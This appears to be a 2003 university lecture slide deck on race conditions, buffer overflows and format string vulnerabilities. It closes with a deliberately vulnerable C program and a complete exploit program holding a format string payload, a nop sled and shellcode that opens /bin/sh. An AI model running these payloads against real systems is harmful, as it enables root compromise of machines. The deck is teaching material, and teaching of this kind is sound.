
An Introduction to Buffer Overflows and Format String Vulnerabilities

Lok Kwong Yan


CS392/681 Polytechnic University
November 5th, 2003

Overview
Race Conditions
Concentration in BO and FS
  Background Information
    Process Memory Layout
    Exec* functions and fork()
    C style function prolog, procedure epilog
  Buffer Overflows
    Why and How
  Format Strings
    Why and How
  An Example

Race Conditions
Anomalous behavior due to unexpected critical
dependence on the relative timing of events.
(dict.die.net)
Focus
  What if the event is access to a resource?
  What if the resource is a file? (In Linux,
  everything is a file.)
  What if we can get access to the file before the
  original process?

RC 2 An Example

Binmail [1] is used to deliver mail to users by
writing messages to the users' mailboxes (files).
Given the following pseudo-code, what can we
do?

1. Use the system call lstat(2) to get information
   about the mailbox. This is used to detect
   symbolic links; if the file is a symbolic link,
   binmail will die.
2. Assuming the file is not a symlink, append the
   letter to the mailbox AS ROOT.

RC 3 An Example Cont

Notice that step 1 checks that the file is not a
symbolic link. What if we can change the file
into a symlink after that step but before step 2?
If we can do so, then we can write to any
file on the system, since step 2 is done as
root.

BOFS - Background Information

Memory
  Organized in 4-byte words
  On Intel (what most of us use), a word is stored in little-endian order
  (lowest byte number first, i.e. the least significant byte at the lowest address)
    Ex.  0xFFEEDDCC: bytes 3 2 1 0 hold FF EE DD CC
    Ex2. String "Lok": bytes 0 1 2 3 hold L o k \0 (\0 = NULL),
         so drawn in the same 3 2 1 0 order it reads \0 k o L
  The reason why the storage of the string seems backwards is that in
  strings (arrays) the byte number is the offset, which goes left to right, and in
  integers the byte number is the significance, where 0 is the least
  significant.

Registers of Interest (Intel Specific)

IP (Instruction Pointer; EIP on 32-bit Intel)
EBP (Extended Base Pointer)
ESP (Extended Stack Pointer)

Process Memory Layout

The different sections
  Code (Processor Instructions)
  Data (Variables) Local and Global
  Stack
  Arguments and Environment Variables
  Heap

Process Memory Layout 2

PML 3 An Example

Given the following program

#include <stdlib.h>

int globalInt;
int main(int argc, char *argv[])
{
    int localInt;
    char localChar;
    char* heapChar = malloc(1);
}

Compiled to a.out and run as:

# a.out Arg1 Arg2

with an environment of home=/

PML 4 Memory Snapshot

[Figure: memory snapshot of the a.out process, with one entry marked "Error"; diagram not preserved]

PML 5 Exec* and fork()

exec* - A family of functions that start a new program
  Replaces the current process space with the new program
fork() - Not the utensil
  Creates a new process space and copies the
  current memory to the new memory
The fork(), exec() combo is used to execute programs
in Linux

PML 6 Function Prolog/Epilog

The caller pushes the arguments onto the stack
from last to first, then executes the following
assembly code

call procedure
;pushes ip onto the stack
;inside procedure this is the procedure prolog
push %ebp
mov %esp, %ebp
sub $x, %esp
;x is the total size in bytes of the local variables

The epilog restores the saved values from the
stack

Buffer Overflows

A buffer is storage space in a program, usually
an array
The Problem (inherent trust in users):
  CS courses tell us to assume that user input is
  always less than a certain constant
  Improper bounds checking
  Time of check to time of use
Two Kinds
  Well known buffer overflow (*cpy functions)
  Off by 1 error

BO 2 Buffer Overflow from *cpy

Array copy functions do not do bounds checking: strcpy(),
memcpy(), etc.
  Though memcpy and the *ncpy functions take a
  maximum number of characters to copy, they still do not make
  sure that the target has that much space available
Example: strcpy(char* tar, char* src)
  Continues copying characters from src to tar until a NULL is
  reached in src
  If strlen(src) >= the size of the buffer tar points to, then a buffer overflow occurs
  What happens? -> Next Slide

BO 3 strcpy() example

Actual Example, given:

int i = 0xffffffff; char ca[4]; strcpy(ca, "0123A");
//strlen(source) = 5, sizeof(ca) = 4, problem!!!

Address      Before        After
0xbffffffb   0xffffffff    0xffff0041        (i)
0xbffffff8   0x00000000    '3' '2' '1' '0'   (ca)

i was overwritten!! overflow occurred

BO 4 Off by 1 errors

Results from using wrong limits for loops
Actual Example, given:

int i = 4; char ca[i]; for(int j = i; j >= 0; ca[j--] = 'A');
//the first write goes to ca[4], one element past the end of ca

Address      Before        After
0xbffffffb   4             0x00000041   (i)
0xbffffff8   0x00000000    "AAAA"       (ca)

i was overwritten!! overflow occurred

BO 5 A Little Fun
What is the output of the following code snippet?
int counter;
char ca[4];
for(counter = 0; counter < 100; ++counter)
{
    sprintf(ca, "abcd");
    printf("%d", counter);
}

BO 6 What Can We Do With Buffer Overflows?

If the src string is selected properly, then we can rewrite
important information
  Ex. Redirect where the function returns (change the saved ip to
  anything we want, such as to run code that starts a shell [a root
  shell is the holy grail of attacks since it means you have full
  control of the target machine, so anything closer to that is a good
  thing])
Egg - a well formatted string that (usually) contains
  A nop region
  A shellcode region
  A return address region
and is the source string that is used to overflow the
buffer; we will get a better idea next ->

BO 7 Egg Components

Nops (0x90) are our best friend: a nop is a one-byte
instruction that does nothing (therefore no adverse
effects), so IP redirection does not have to be exact;
any address within the nop region is fine
Nops are used to pad a safe area where the instruction
pointer can point to and we will still get our desired result,
the running of the shellcode
Shellcode is machine code that opens a shell
  Where to get it? (easy - Google, hard - gdb)
The return address region is an address, repeated, that points to the
nop region

BO 8 Structure of an Egg
In buffer overflows, the egg is usually in the form
of:
nop,nop,nop,nop,shellcode,ret,ret,ret

Address      Before       After
0xbffffffb   Saved RET    ret (0xbffff010)
0xbffffff8   Saved EBP    ret (0xbffff010)
             Buffer       ret (0xbffff010)
                          ret (0xbffff010)
                          ret (0xbffff010)
                          shellcode
                          nop
                          nop
                          nop
0xbffff000                nop

Why? We want this structure because
instructions get processed from down to
up (from lower to higher addresses). If we are able to have the return
address overwrite the saved IP, then when
the current function ends, the saved IP
(now ret) will be the address of the next instruction to
process. Since that instruction is in
the nop region, as the instructions get
processed, execution goes farther and farther up
the stack until the shellcode gets
processed and finally a shell is opened.
(Note that any code can be run, not just
shell code)

Format Strings

Format string vulnerabilities result from
improper use of functions that use format strings
(the printf class of functions)
Format strings are extremely powerful
  View any memory location
  Alter any memory location (IP?)
  Easily crash a program
But, they are hard to come by (they do not
result from assumptions as buffer overflows do;
they are simply misunderstandings of how the
printf family of functions should or can be used)

FS 2 printf()

printf(char* fstr, ...)
  fstr is the format string
  ... is the variable list of arguments that fstr should be
  processing
fstr is a string that may contain special escape
sequences that tell printf() how to format the
output (how to treat the byte stream)
Common escape sequences are %x, %u, %d,
%c, %s, (%n?)

FS 3 printf() algorithm
for each char in fstr until NULL
    if curChar == % then
        switch (nextChar)
            case % : write a % to output
            case x : pop* a word off the stack and write that word as hex to output
            case s : pop* a word off the stack, treat that as a pointer to a
                     character array, starting at that position write each
                     character to output until 0 is reached
            case n : pop* a word off the stack, treat it as an address, and write the
                     number of characters written so far to that address
    else
        write curChar to output
*Popping a word off the stack for format string functions does not mean using the pop instruction. It
means reading a word off the stack, starting at the word just above the format string pointer (EBP+12
in printf()'s frame with the prolog shown earlier, since EBP+8 holds the first parameter; this is where
the 2nd parameter passed to printf() starts), and advancing by 4 bytes with each pop (read).

FS 4 The Problem

All printf() needs in order to compile is a char* as the first
parameter. There is no check to make sure the number
of parameters is equal to the number specified in the
format string
Since the format string sequences do not appear in
natural English, when programmers use printf()
improperly, it is not evident during normal execution of
the program.
Programmers are often not taught the pre and post
conditions of the printf family of functions, or of
other functions such as the strcpy functions. Without a good
understanding of how these functions work, we can
never use them properly

FS 6 Improper use of printf(): an example

Given the following code:

printf(message);

What is the output if message = "Hi my name is Lok."?

Hi my name is Lok. No problems, expected normal use

What if message = "%08x %08x"?

Well, these are format string escape sequences, which means printf() will process them.
If the memory of printf() looks like this

0xbffffffb   0x000000ff (stuff on stack)
0xbffffff8   0x0000ffff (stuff on stack)
0xbffffff4   address of "%08x %08x"
0xbffffff0   Saved RET (0x080000ff)
0xbfffffeb   Saved EBP (0xbfffffff)

then the first %08x will take the word just above the format string pointer (EBP+12, since
after the function prolog EBP points to the Saved EBP slot) and the second will take the word
after that (EBP+16), so the output will look like
0000ffff 000000ff : Problem, an unexpected string in message (who would have thought
a message would contain a weird %08x in it?)

FS 5 A (im)Proper Format String

Given the proper format string, we can do
whatever we want! Let's say we want to change
a word in memory.
What I like to use
  %--x pops a word from the stack and prints it out in -- character spaces
  %n pops a word from the stack and treats it as an address, writes the number
  of characters written so far to that address.
  %hn same as %n but only writes 2 bytes to the address specified by the stack pop
A general format of a format string is
  targetAdd, stackpops, writes
  targetAdd is the address we wish to overwrite
  Stack pops are operations to traverse up the stack until we get to a section of
  memory that is of interest, such as where targetAdd is
  Writes are the %n operations; these actually do the writing to memory

FS 6 The Procedure

The procedure for a simple attack is
1. Place the target address (in our case it's part
   of the format string itself) on the stack
2. Use stackpops to traverse up the stack until
   you reach the targetAdd
3. Use %n's to write to the memory pointed to by
   targetAdd

FS 7 Some Things to Know

1. Split the format string attack into two parts. First find out
   how many %x's it takes to get back to the start of the
   format string (to targetAdd), then try to do the attack
2. To write to a memory address, have two targetAdds
   separated with a dummy word
   (targetAdd,dummyword,targetAdd+2). This way we can
   use the combination %hn %--x %hn to write a whole
   word at targetAdd, where -- is the proper
   number so that targetAdd+2 contains the 2-byte value of
   our choice (the dummy word is what the %--x between the
   two %hn's pops)
3. With %hn only the low 16 bits of the count of characters
   written to output are stored, so the written value cycles
   (wraps around at 65536).

FS 8 An Example

Given the following program and memory
snapshot, what is the format string that will give
us a root shell?

char egg[128] = "..."; //where ... is nops and shellcode
char carr[128] = "FormatString"; //where FormatString is what we need
printf(carr);

We can readily see that the target address we want to change
is the address of the saved IP, which is 0xbffffe68. We can
also see that we need exactly one %x to get to the beginning
of our format string. We also see that since the NOP region
starts at address 0xbffffef0, that is the value we want to write
into the saved IP.

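FS 9 The Attack String

The target address is 0xbffffe68, so we want to start
with 0xbffffe6a 0xffffffff 0xbffffe68 (the address of the upper
half comes first because the smaller value, 0xbfff, has to be
written first)
We want to write 0xbffffef0 to the target address,
so bfff goes to fe6a and fef0 goes to fe68; in
decimal the values are 49151 and 65264
respectively.
Finally the format string looks like:
\x6a\xfe\xff\xbf\xff\xff\xff\xff\x68\xfe\xff\xbf
%49139x%hn%16113x%hn
(the 12 address bytes plus 49139 give 49151, and 49151 plus 16113 gives 65264)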

Some Fun Stuff/Notes

Buffer Overflows
  DOS with
    Overflow with src = \xff\xff..
  No Printing Of Memory
Format Strings
  DOS with
    Use %s%n%s%n
    Use %f%f
  Print memory with
    Use %x

A Real Example (killme.c)


#include<stdio.h>
#include<string.h>
#include<stdlib.h>
int main(int argc, char *argv[])
{
char message[100] = "Hello ";
char *source;
if ( (source = malloc(50*sizeof(char))) == NULL)
{
printf("Couldn't put anything onto heap\n");
exit(1);
}
//This is the lazy way of getting address information, proper way
// would be through gdb
printf("%08x . %08x . %08x\n", argv[1], &source, &message);
//this is a secure copying
strncpy( (char *)((char *)message + 6), argv[1], 93);
printf(message); //just says hello and whatever we put in
//debug messages to show that it actually works
printf("\n\nMessaged Printed Out:\nCopying Buffers\n\n"
"%08x was written to source\n"
"Source is: %s\n", source, source);
//This should be a safe string cpy since source was malloced for
// only 50 characters and message can hold 100
strcpy(message,source);
return(0);
}

Code Analysis

We should see the following problem:
  printf(message);
Since message is partially user supplied, it
cannot be trusted!!
A not so obvious problem is
  strcpy(message,source);
Though it's true that source should be at most 50
characters long, if we can change where source
points to, then we can do a buffer overflow

The Attack
To illustrate both buffer overflows and
format string attacks I will use a format
string attack to change the address
where source is pointing to, to a string of
my choice so as to cause a buffer
overflow and open a shell

TA 2 Format String

As mentioned before, we want the following format string format:

\xec\xee\xff\xbf\xff\xff\xff\xff\xea\xee\xff\xbf
%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x
%00008x%8x%00008x%8x
\x90\x90\x90\x90\x90\x90\x90\x90\x90
shellcodeRETRETRETRETRETRET

The first line is reserved space for the target addresses (the addresses to be overwritten)
The second line is the stack popping operations
The third line reserves space for the memory writes, where %8x will turn into %hn
and %00008x will turn into %-----x, where ----- is the number needed to get the 2-byte value
we want. We want to reserve the space so that we can take care of any
offset problems now, so that when the final attack comes around, the number
of characters and their offsets are exactly the same
The fourth line is the nop region
The fifth line is where the shellcode and return addresses go
After discovering the addresses I want to overwrite and their values, the
following code results. ->

TA 3 Attack Code (attack.c)


int main()
{
char temp[4096] ="\xff\xff\x6e\xf9\xff\xbf\xff\xff\xff\xff\x6c\xf9\xff\xbf"
"%08x%08x%08x%08x%08x%08x%08x%08x%49067x%hn%15243x%hn"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c"
"\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29"
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh"
"\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf"
"\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf"
"\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf"
"\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf";
execl("/home/lok/format/format2/killme.bin","killme.bin",temp,0);
return(0);
}

TA 4 Notes

You don't have to start a shell. These are just tools; use
them to your heart's content.
The exploit code is machine and even instance
dependent; the addresses that work for one machine
may not work for another. (Think about the environment
and arguments memory area.)
The steps shown here are labor intensive; there are
papers that describe how to automate the process of
finding the addresses and building the proper length
strings.
The only proper way to prevent these problems is
through the education and understanding of the
functions being used.

References
[1] Matt Bishop, "Race Conditions, Files, and Security Flaws; or
the Tortoise and the Hare Redux",
http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/ucd-ecs-95-08.pdf
[2] Aleph One, "Smashing the Stack for Fun and Profit",
http://www.shmoo.com/phrack/Phrack49/p49-14

Questions?

Ask them now


Ask them later
email - I think not!
Ask them never
